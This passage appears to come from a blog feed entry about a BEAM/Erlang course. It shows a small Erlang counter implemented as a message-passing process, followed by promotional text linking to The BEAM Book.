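start() -> spawn(fun() -> loop(0) end).

bump(Pid) -> Pid ! bump, ok.

read(Pid) ->
    Pid ! {read, self()},
    receive {value, N} -> N end.

loop(N) ->
    receive
        bump         -> loop(N + 1);
        {read, From} -> From ! {value, N}, loop(N)
    end.
```

Because every counter is an isolated process, thousands of them can run concurrently without locks, and a crash in one leaves the rest untouched.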
&lt;p&gt;Whether you&#39;re an experienced developer looking to elevate your BEAM-related projects or a beginner intrigued by the unique possibilities of Erlang and Elixir, this course is a valuable resource.&lt;/p&gt;
&lt;p&gt;Much of the content in the course is based on &lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;, also available for free &lt;a href=&quot;https://blog.stenmans.org/theBeamBook/&quot;&gt;online&lt;/a&gt;. For background on BEAM&#39;s evolution over the decades, see &lt;a href=&quot;https://happihacking.com/blog/posts/2023/erlang-history/&quot;&gt;Three Decades with Erlang&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
</feed>
